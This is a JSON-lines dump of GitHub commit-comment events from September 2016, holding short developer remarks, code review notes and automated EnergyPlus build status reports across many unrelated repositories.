{"id":"4604700231","type":"CommitCommentEvent","actor":{"login":"Daroald"},"repo":{"name":"Gustavo131997/Proyecto_de_Programacion"},"payload":{"comment":{"id":19136060,"position":4,"line":11,"path":"Avance01 -GitHub/TerminalBuses.java","commit_id":"1bc5633db36008821bc16c074f6a3c4c811bcbec","created_at":"2016-09-22T19:52:31Z","updated_at":"2016-09-22T19:52:31Z","body":"Faltaba el array aqui para los funcionarios dado que el terminal va a estar guardandolos tambien"}},"created_at":"2016-09-22T19:52:31Z"}
{"id":"4604702255","type":"CommitCommentEvent","actor":{"login":"Daroald"},"repo":{"name":"Gustavo131997/Proyecto_de_Programacion"},"payload":{"comment":{"id":19136063,"position":11,"line":18,"path":"Avance01 -GitHub/TerminalBuses.java","commit_id":"1bc5633db36008821bc16c074f6a3c4c811bcbec","created_at":"2016-09-22T19:52:54Z","updated_at":"2016-09-22T19:52:54Z","body":"la inicializacion de los 2 array"}},"created_at":"2016-09-22T19:52:54Z"}
{"id":"4604703222","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19136067,"position":null,"line":null,"path":null,"commit_id":"9607d25e1f110f25cad39363daf16bb346afd522","created_at":"2016-09-22T19:53:07Z","updated_at":"2016-09-22T19:53:07Z","body":"ah now I understand what you intended to fix, sorry. Anyway I believe SF does not verify it in SEE because its early enough to verify it in search before a move is done..."}},"created_at":"2016-09-22T19:53:07Z"}
{"id":"4604703573","type":"CommitCommentEvent","actor":{"login":"fred2028"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19136068,"position":14,"line":43,"path":"Libraries/Experimental/SwipeableRow/SwipeableListView.js","commit_id":"5c13eaccbd7136949525b6c6eb3ac7e0c63c662f","created_at":"2016-09-22T19:53:08Z","updated_at":"2016-09-22T19:53:08Z","body":"Good call, let me test it out "}},"created_at":"2016-09-22T19:53:08Z"}
{"id":"4604704245","type":"CommitCommentEvent","actor":{"login":"tomiqwww"},"repo":{"name":"tomiqwww/test-andriichuk"},"payload":{"comment":{"id":19136070,"position":null,"line":null,"path":null,"commit_id":"020dacb94966efee8e18fa09863cf1f44aefd3db","created_at":"2016-09-22T19:53:20Z","updated_at":"2016-09-22T19:53:20Z","body":"zdsfsdfsdfs"}},"created_at":"2016-09-22T19:53:20Z"}
{"id":"4604704796","type":"CommitCommentEvent","actor":{"login":"tomiqwww"},"repo":{"name":"tomiqwww/test-andriichuk"},"payload":{"comment":{"id":19136071,"position":2,"line":2,"path":"README.md","commit_id":"020dacb94966efee8e18fa09863cf1f44aefd3db","created_at":"2016-09-22T19:53:26Z","updated_at":"2016-09-22T19:53:26Z","body":"sadfsadfasdf"}},"created_at":"2016-09-22T19:53:26Z"}
{"id":"4604705472","type":"CommitCommentEvent","actor":{"login":"tomiqwww"},"repo":{"name":"tomiqwww/test-andriichuk"},"payload":{"comment":{"id":19136075,"position":1,"line":1,"path":"README.md","commit_id":"020dacb94966efee8e18fa09863cf1f44aefd3db","created_at":"2016-09-22T19:53:34Z","updated_at":"2016-09-22T19:53:34Z","body":"dghdfghfgh"}},"created_at":"2016-09-22T19:53:34Z"}
{"id":"4604707992","type":"CommitCommentEvent","actor":{"login":"romanlukichev"},"repo":{"name":"romanlukichev/CustomerTransaction2"},"payload":{"comment":{"id":19136082,"position":null,"line":null,"path":null,"commit_id":"f7d84a8f60eedf2f113cc5e0498ca7cbc20e907a","created_at":"2016-09-22T19:54:04Z","updated_at":"2016-09-22T19:54:04Z","body":"![screen_2016-09-20 15 16 05](https://cloud.githubusercontent.com/assets/18017741/18763742/890c6380-80c3-11e6-9ae3-c3c73b7e1416.jpg)\r\n"}},"created_at":"2016-09-22T19:54:04Z"}
{"id":"4604708804","type":"CommitCommentEvent","actor":{"login":"vipulnaik"},"repo":{"name":"riceissa/wikipedia-decline"},"payload":{"comment":{"id":19136084,"position":null,"line":null,"path":null,"commit_id":"022d13cdd15de3767c30406ecbb24ae9e656a3c7","created_at":"2016-09-22T19:54:14Z","updated_at":"2016-09-22T19:54:14Z","body":"rad!"}},"created_at":"2016-09-22T19:54:14Z"}
{"id":"4604711923","type":"CommitCommentEvent","actor":{"login":"JSlote"},"repo":{"name":"mccurdyc/Scheduling"},"payload":{"comment":{"id":19136088,"position":null,"line":null,"path":null,"commit_id":"fe9ac368a05c682396db84e57d76a0a6515a844b","created_at":"2016-09-22T19:54:51Z","updated_at":"2016-09-22T19:54:51Z","body":"> # _`Nice`_"}},"created_at":"2016-09-22T19:54:51Z"}
{"id":"4604715267","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19136097,"position":null,"line":null,"path":null,"commit_id":"a236e3799d08fc43546c7cb5c7204f70ef918444","created_at":"2016-09-22T19:55:29Z","updated_at":"2016-09-22T19:55:29Z","body":"MoreDayliteFollowup (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a236e3799d08fc43546c7cb5c7204f70ef918444-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T19:55:29Z"}
{"id":"4604725194","type":"CommitCommentEvent","actor":{"login":"lashtear"},"repo":{"name":"lashtear/tinymux"},"payload":{"comment":{"id":19136119,"position":null,"line":null,"path":null,"commit_id":"9616b85f7eb1bd859d0e4c4ef15d3d8294d88386","created_at":"2016-09-22T19:57:21Z","updated_at":"2016-09-22T19:57:21Z","body":"Interesting.  Likely you're building without an OpenSSL available, so UNIX_SSL isn't defined, and I forgot to protect the tls_ctx reference with an ifdef there.  Will fix shortly."}},"created_at":"2016-09-22T19:57:21Z"}
{"id":"4604734073","type":"CommitCommentEvent","actor":{"login":"shefik"},"repo":{"name":"zikula/core"},"payload":{"comment":{"id":19136136,"position":null,"line":null,"path":null,"commit_id":"40276834123494c50210e27f64abc2bf28b391a3","created_at":"2016-09-22T19:59:04Z","updated_at":"2016-09-22T19:59:04Z","body":"I'll take a look."}},"created_at":"2016-09-22T19:59:04Z"}
{"id":"4604737008","type":"CommitCommentEvent","actor":{"login":"slavapestov"},"repo":{"name":"apple/swift-lldb"},"payload":{"comment":{"id":19136141,"position":null,"line":null,"path":null,"commit_id":"121a68e62aa2fb6706af243d1a74c41fc8528536","created_at":"2016-09-22T19:59:37Z","updated_at":"2016-09-22T19:59:37Z","body":"I removed the code that you just added back. Which tests were failing? Are you sure this patch was the cause? I'm about to push a change that kills GenericTypeParamDecl::getArchetype(), so I'm going to remove this bit of code again."}},"created_at":"2016-09-22T19:59:37Z"}
{"id":"4604737172","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/manjaro-tools"},"payload":{"comment":{"id":19136142,"position":null,"line":null,"path":null,"commit_id":"5b780579b6bacb6d1faa407eb32819eece53446b","created_at":"2016-09-22T19:59:40Z","updated_at":"2016-09-22T19:59:40Z","body":"It will never make sense to install the same package groups for each environment. It will have too be different for every toolkit and environment. Already between KDE and xfce its pointless - not to even start with other editions..."}},"created_at":"2016-09-22T19:59:40Z"}
{"id":"4604737239","type":"CommitCommentEvent","actor":{"login":"junghans"},"repo":{"name":"votca/xtp"},"payload":{"comment":{"id":19136143,"position":null,"line":null,"path":null,"commit_id":"32285235c1fffad98cdc69d647d45c08753274de","created_at":"2016-09-22T19:59:40Z","updated_at":"2016-09-22T19:59:40Z","body":"@12AngryMen : ok?"}},"created_at":"2016-09-22T19:59:40Z"}
{"id":"4600012534","type":"CommitCommentEvent","actor":{"login":"lilibei"},"repo":{"name":"aminglinux/resource"},"payload":{"comment":{"id":19123858,"position":null,"line":null,"path":null,"commit_id":"42c389c3c9b5d4881ce71bb0bf286182f3e6b518","created_at":"2016-09-22T02:00:29Z","updated_at":"2016-09-22T02:00:29Z","body":"很赞的"}},"created_at":"2016-09-22T02:00:29Z"}
{"id":"4600013880","type":"CommitCommentEvent","actor":{"login":"KeriWarr"},"repo":{"name":"gaearon/redux-devtools"},"payload":{"comment":{"id":19123868,"position":20,"line":19,"path":"examples/todomvc/index.js","commit_id":"64f58b7010a1b2a71ad16716eb37ac1031f93915","created_at":"2016-09-22T02:01:01Z","updated_at":"2016-09-22T02:01:01Z","body":"I have a component structure which looks like:\r\n```<AppContainer><Root /></AppContainer>```\r\n```\r\n    <Router\r\n      history={browserHistory}\r\n      render={applyRouterMiddleware(useScroll())}\r\n      onUpdate={onUpdate}\r\n    >\r\n      {routes}\r\n    </Router>```\r\nwhere routes is a const, defined above the Router.\r\n\r\nI get the following error: `Warning: You cannot change <Router routes>; it will be ignored`\r\nI'm not sure where to go from here as this message feels somewhat contradictory to the above advice."}},"created_at":"2016-09-22T02:01:01Z"}
{"id":"4600015889","type":"CommitCommentEvent","actor":{"login":"GirafiStudios"},"repo":{"name":"squeek502/AppleCore"},"payload":{"comment":{"id":19123874,"position":null,"line":null,"path":null,"commit_id":"c7c9d75e75a830c2b00b315ea06357bba5cb99b6","created_at":"2016-09-22T02:01:53Z","updated_at":"2016-09-22T02:01:53Z","body":"As I already said in #77 Apple Core is not gonna change its mod ID to lower case, before 1.11 :)"}},"created_at":"2016-09-22T02:01:53Z"}
{"id":"4600016578","type":"CommitCommentEvent","actor":{"login":"Kha"},"repo":{"name":"leanprover/lean"},"payload":{"comment":{"id":19123875,"position":48,"line":443,"path":"library/init/logic.lean","commit_id":"318ef761d3f07ba97a1aca5fcb9235ece34a7707","created_at":"2016-09-22T02:02:09Z","updated_at":"2016-09-22T02:02:09Z","body":"This is just awesome"}},"created_at":"2016-09-22T02:02:09Z"}
{"id":"4600019480","type":"CommitCommentEvent","actor":{"login":"elifoster"},"repo":{"name":"squeek502/AppleCore"},"payload":{"comment":{"id":19123881,"position":null,"line":null,"path":null,"commit_id":"c7c9d75e75a830c2b00b315ea06357bba5cb99b6","created_at":"2016-09-22T02:03:19Z","updated_at":"2016-09-22T02:03:19Z","body":"Ah, I misunderstood your comment when I originally read it :+1:"}},"created_at":"2016-09-22T02:03:19Z"}
{"id":"4600019848","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19123883,"position":null,"line":null,"path":null,"commit_id":"148fcbc57e5747a665fb4ee78d9a8270e28d08cd","created_at":"2016-09-22T02:03:28Z","updated_at":"2016-09-22T02:03:28Z","body":"the old init didn't support pupmode 3.\r\n\r\nat least i couldn't spot pupmode=3 or pumode=2 then pupmode+1, it's a mystery when that pupmode became obsoleted"}},"created_at":"2016-09-22T02:03:28Z"}
{"id":"4600019936","type":"CommitCommentEvent","actor":{"login":"carl-j-love"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":19123884,"position":null,"line":null,"path":null,"commit_id":"a9e11b68b4dee10cb9e1a519c78a89d919c3b9db","created_at":"2016-09-22T02:03:30Z","updated_at":"2016-09-22T02:03:30Z","body":"And I think that every one of those `anything`s, except the first ones of\nPlate and Weight, can be replaced by t_Hakaru.\n\nOn Wed, Sep 21, 2016 at 9:37 PM, Jacques Carette <notifications@github.com>\nwrote:\n\n> `type/t_Hakaru` := { 'known_continuous', 'known_discrete', 'Ret(anything)',\n>     'Bind(anything, name, anything)', 'specfunc(Msum)', 'Weight(anything, anything)',\n>    t_pw, t_case, 'Plate(anything, name, anything)'}\n>\n> would be an excellent first approximation. I essentially just read\n> integrate, and skipped some cases that we don't want to deal with as\n> inputs (right now).\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/hakaru-dev/hakaru/commit/a9e11b68b4dee10cb9e1a519c78a89d919c3b9db#commitcomment-19123732>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASYo9eTKKZ61A5QpNG8OVxsNNbu6TF1jks5qsdvYgaJpZM4KCvGb>\n> .\n>\n"}},"created_at":"2016-09-22T02:03:30Z"}
{"id":"4600020566","type":"CommitCommentEvent","actor":{"login":"cdrage"},"repo":{"name":"streamlink/streamlink"},"payload":{"comment":{"id":19123888,"position":null,"line":null,"path":null,"commit_id":"b420f6c6ad093f6eded617c9bfb989f6316b1bd7","created_at":"2016-09-22T02:03:45Z","updated_at":"2016-09-22T02:03:45Z","body":"@sbstp Forgot one of the left-over commits and reverted it. Should be good now. I've moved you to our \"contributors\" group @scottbernstein ! Feel free to open a PR with your changes please :)\r\n\r\nThanks"}},"created_at":"2016-09-22T02:03:45Z"}
{"id":"4600021084","type":"CommitCommentEvent","actor":{"login":"huhuhu139751"},"repo":{"name":"huhuhu139751/learnGit"},"payload":{"comment":{"id":19123891,"position":null,"line":null,"path":null,"commit_id":"0cd521f54d4711cad20aaaabf8b724740ecb2900","created_at":"2016-09-22T02:04:00Z","updated_at":"2016-09-22T02:04:00Z","body":"f"}},"created_at":"2016-09-22T02:04:00Z"}
{"id":"4600023593","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19123897,"position":null,"line":null,"path":null,"commit_id":"624ce0e038dd4435ad145913fd1e86b922d71b89","created_at":"2016-09-22T02:05:07Z","updated_at":"2016-09-22T02:05:07Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (mjwitte) - x86_64-MacOS-10.9-clang: OK (2334 of 2335 tests passed, 0 test warnings)\n\n * 1 test had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-624ce0e038dd4435ad145913fd1e86b922d71b89-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-624ce0e038dd4435ad145913fd1e86b922d71b89-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T02:05:07Z"}
{"id":"4600024939","type":"CommitCommentEvent","actor":{"login":"icecreamtoo"},"repo":{"name":"DEIT2014/team5exercise"},"payload":{"comment":{"id":19123902,"position":null,"line":null,"path":null,"commit_id":"67bb676e665416a17a66a34ea91238d561f3bc20","created_at":"2016-09-22T02:05:39Z","updated_at":"2016-09-22T02:05:39Z","body":"OK"}},"created_at":"2016-09-22T02:05:39Z"}
{"id":"4600025448","type":"CommitCommentEvent","actor":{"login":"xfunforx"},"repo":{"name":"xfunforx/XglyphiOS"},"payload":{"comment":{"id":19123904,"position":null,"line":null,"path":null,"commit_id":"bdf58092799d32aa53a57f5fb44612ba11339a96","created_at":"2016-09-22T02:05:50Z","updated_at":"2016-09-22T02:05:50Z","body":"YES. https://github.com/xfunforx/XglyphController\n\n2016-09-21 14:59 GMT+08:00 No1KnowMe <notifications@github.com>:\n\n> Did you upload the Controll App?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/xfunforx/XglyphiOS/commit/bdf58092799d32aa53a57f5fb44612ba11339a96#commitcomment-19108991>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ANVDrGpb73r26WZIShpXCI7pwVhAzOsmks5qsNXRgaJpZM4KABDI>\n> .\n>\n"}},"created_at":"2016-09-22T02:05:50Z"}
{"id":"4600027748","type":"CommitCommentEvent","actor":{"login":"cgtz"},"repo":{"name":"linkedin/ambry"},"payload":{"comment":{"id":19123915,"position":30,"line":654,"path":"ambry-router/src/test/java/com.github.ambry.router/GetBlobOperationTest.java","commit_id":"42c63605de636141eea2cec8ce123b1ddc4872da","created_at":"2016-09-22T02:06:47Z","updated_at":"2016-09-22T02:06:47Z","body":"yes, fixed."}},"created_at":"2016-09-22T02:06:47Z"}
{"id":"4600028432","type":"CommitCommentEvent","actor":{"login":"LycanN"},"repo":{"name":"TeamOfUs/guess-and-draw"},"payload":{"comment":{"id":19123918,"position":14,"line":12,"path":"bin/websocket-server.js","commit_id":"6ea31d6f0c3e6e4d32afc6e5e4154bef5b6e0a46","created_at":"2016-09-22T02:07:03Z","updated_at":"2016-09-22T02:07:03Z","body":"keyi"}},"created_at":"2016-09-22T02:07:03Z"}
{"id":"4600028899","type":"CommitCommentEvent","actor":{"login":"murilao"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19123920,"position":null,"line":null,"path":null,"commit_id":"5722d3860c590d0ff7e5bfaffcfcede8028b720f","created_at":"2016-09-22T02:07:15Z","updated_at":"2016-09-22T02:07:15Z","body":"thank you :)"}},"created_at":"2016-09-22T02:07:15Z"}
{"id":"4600029065","type":"CommitCommentEvent","actor":{"login":"asdgh1000"},"repo":{"name":"asdgh1000/demo"},"payload":{"comment":{"id":19123921,"position":13,"line":11,"path":"README.md","commit_id":"6c214958269e86942c49290244f512b914a836ea","created_at":"2016-09-22T02:07:19Z","updated_at":"2016-09-22T02:07:19Z","body":".idea*"}},"created_at":"2016-09-22T02:07:19Z"}
{"id":"4600030136","type":"CommitCommentEvent","actor":{"login":"chengzongxin"},"repo":{"name":"chengzongxin/XXGBrowser"},"payload":{"comment":{"id":19123925,"position":1,"line":1,"path":"README.md","commit_id":"a8b3de57c2aac18aea0738566c79dbd91f536b9f","created_at":"2016-09-22T02:07:46Z","updated_at":"2016-09-22T02:07:46Z","body":"123"}},"created_at":"2016-09-22T02:07:46Z"}
{"id":"4600034218","type":"CommitCommentEvent","actor":{"login":"LycanN"},"repo":{"name":"TeamOfUs/guess-and-draw"},"payload":{"comment":{"id":19123928,"position":5,"line":3,"path":"bin/websocket-server.js","commit_id":"6ea31d6f0c3e6e4d32afc6e5e4154bef5b6e0a46","created_at":"2016-09-22T02:09:02Z","updated_at":"2016-09-22T02:09:02Z","body":"guess  guess  who am i  ヾ(。￣□￣)ﾂ゜゜゜"}},"created_at":"2016-09-22T02:09:02Z"}
{"id":"4600035850","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":19123931,"position":null,"line":null,"path":null,"commit_id":"a9e11b68b4dee10cb9e1a519c78a89d919c3b9db","created_at":"2016-09-22T02:09:42Z","updated_at":"2016-09-22T02:09:42Z","body":"Right."}},"created_at":"2016-09-22T02:09:42Z"}
{"id":"4600038786","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19123938,"position":null,"line":null,"path":null,"commit_id":"91020ce3ba655922bdba1374cbd910b4b9f8784c","created_at":"2016-09-22T02:10:47Z","updated_at":"2016-09-22T02:10:47Z","body":"Also see [Issue 295](https://github.com/weidai11/cryptopp/issues/295)."}},"created_at":"2016-09-22T02:10:47Z"}
{"id":"4600041119","type":"CommitCommentEvent","actor":{"login":"densilcabrera"},"repo":{"name":"densilcabrera/aarae"},"payload":{"comment":{"id":19123943,"position":null,"line":null,"path":null,"commit_id":"62cabc73ec34982c3c3200eeda7e666cb70b2c2c","created_at":"2016-09-22T02:11:53Z","updated_at":"2016-09-22T02:11:53Z","body":"oops - some audio files also added by mistake"}},"created_at":"2016-09-22T02:11:53Z"}
{"id":"4600042025","type":"CommitCommentEvent","actor":{"login":"madeye"},"repo":{"name":"shadowsocks/shadowsocks-android"},"payload":{"comment":{"id":19123947,"position":4,"line":121,"path":"src/main/AndroidManifest.xml","commit_id":"0edbe012375a783589838cdaacda758b49e00300","created_at":"2016-09-22T02:12:18Z","updated_at":"2016-09-22T02:12:18Z","body":"Got it."}},"created_at":"2016-09-22T02:12:18Z"}
{"id":"4600045998","type":"CommitCommentEvent","actor":{"login":"ahmesaab"},"repo":{"name":"ahmesaab/Persona"},"payload":{"comment":{"id":19123958,"position":null,"line":null,"path":null,"commit_id":"eaae3fb9f706df36dcfcaf912dd250030c6c034e","created_at":"2016-09-22T02:13:59Z","updated_at":"2016-09-22T02:13:59Z","body":"Good Job ya semsem (Y)"}},"created_at":"2016-09-22T02:13:59Z"}
{"id":"4600047534","type":"CommitCommentEvent","actor":{"login":"liuyang1"},"repo":{"name":"liuyang1/test"},"payload":{"comment":{"id":19123962,"position":4,"line":29,"path":"lang/c/leetcode/countNodes.222.c","commit_id":"4758c7e530916d8fe20b40581c2256ca9eae130c","created_at":"2016-09-22T02:14:39Z","updated_at":"2016-09-22T02:14:39Z","body":"Copy-Paste is risky and dangerous! :-1: It's hard to maintain!"}},"created_at":"2016-09-22T02:14:39Z"}
{"id":"4600047898","type":"CommitCommentEvent","actor":{"login":"wobblybobz"},"repo":{"name":"MangoScango/PokemonGo-Map"},"payload":{"comment":{"id":19123963,"position":null,"line":null,"path":null,"commit_id":"9e3b998723d5f83100559b7134fb7a0a40ebdfa9","created_at":"2016-09-22T02:14:48Z","updated_at":"2016-09-22T02:14:48Z","body":"@MangoScango Partially agree with @kbtbc Tried this one last night and found that only some pokestops do not show a scanned location circle around them. When looking at logs it shows that the worker assigned to this locations has been dropped because of an exception.\r\n\r\n[search-worker-11][    search][    ERROR] Exception in search_worker under account username Exception message: local variable 'p' referenced before assignment"}},"created_at":"2016-09-22T02:14:48Z"}
{"id":"4600049245","type":"CommitCommentEvent","actor":{"login":"xuzaixian"},"repo":{"name":"LycanN/-1"},"payload":{"comment":{"id":19123970,"position":null,"line":null,"path":null,"commit_id":"a43983af85dd7bc07e38179122b506f10e847dbd","created_at":"2016-09-22T02:15:21Z","updated_at":"2016-09-22T02:15:21Z","body":"happy coding😎"}},"created_at":"2016-09-22T02:15:21Z"}
{"id":"4600049306","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19123971,"position":null,"line":null,"path":null,"commit_id":"ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5","created_at":"2016-09-22T02:15:23Z","updated_at":"2016-09-22T02:15:23Z","body":"fixBranchTransition (mitchute) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-22T02:15:23Z"}
{"id":"4600049569","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19123972,"position":null,"line":null,"path":null,"commit_id":"ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5","created_at":"2016-09-22T02:15:30Z","updated_at":"2016-09-22T02:15:30Z","body":"fixBranchTransition (mitchute) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T02:15:30Z"}
{"id":"4600050046","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19123974,"position":null,"line":null,"path":null,"commit_id":"ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5","created_at":"2016-09-22T02:15:42Z","updated_at":"2016-09-22T02:15:42Z","body":"fixBranchTransition (mitchute) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.svg)</a>\n"}},"created_at":"2016-09-22T02:15:42Z"}
{"id":"4600050477","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19123975,"position":null,"line":null,"path":null,"commit_id":"ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5","created_at":"2016-09-22T02:15:54Z","updated_at":"2016-09-22T02:15:54Z","body":"fixBranchTransition (mitchute) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.svg)</a>\n"}},"created_at":"2016-09-22T02:15:54Z"}
{"id":"4600050798","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19123976,"position":null,"line":null,"path":null,"commit_id":"ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5","created_at":"2016-09-22T02:16:03Z","updated_at":"2016-09-22T02:16:03Z","body":"fixBranchTransition (mitchute) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T02:16:03Z"}
{"id":"4600056172","type":"CommitCommentEvent","actor":{"login":"kabirvirji"},"repo":{"name":"lemonstand/lscloud-theme-happyhour"},"payload":{"comment":{"id":19123982,"position":null,"line":null,"path":null,"commit_id":"acab2d4d755c71cd5d6ea141dc5afdc2554e0ca9","created_at":"2016-09-22T02:18:09Z","updated_at":"2016-09-22T02:18:09Z","body":"@tomcornall thanks"}},"created_at":"2016-09-22T02:18:09Z"}
{"id":"4600061663","type":"CommitCommentEvent","actor":{"login":"edilsalvador"},"repo":{"name":"PLMCSIT/LexiCom"},"payload":{"comment":{"id":19123992,"position":null,"line":null,"path":null,"commit_id":"bbb38f691e76ba733dbd68791ec2d72e162c2f1d","created_at":"2016-09-22T02:20:25Z","updated_at":"2016-09-22T02:20:25Z","body":"Added TokenLibrary to inherit abstract class TokenClass.\r\nNew approach on accessing tokens, using Object Class.\r\nAdded Description table on Lexical Output."}},"created_at":"2016-09-22T02:20:25Z"}
{"id":"4600064013","type":"CommitCommentEvent","actor":{"login":"jkotalik"},"repo":{"name":"aspnet/BasicMiddleware"},"payload":{"comment":{"id":19123997,"position":null,"line":null,"path":null,"commit_id":"ead052324c911604a18a64594672613cca211115","created_at":"2016-09-22T02:21:26Z","updated_at":"2016-09-22T02:21:26Z","body":"You don't know how many times I changed this from abstract to an interface XD"}},"created_at":"2016-09-22T02:21:26Z"}
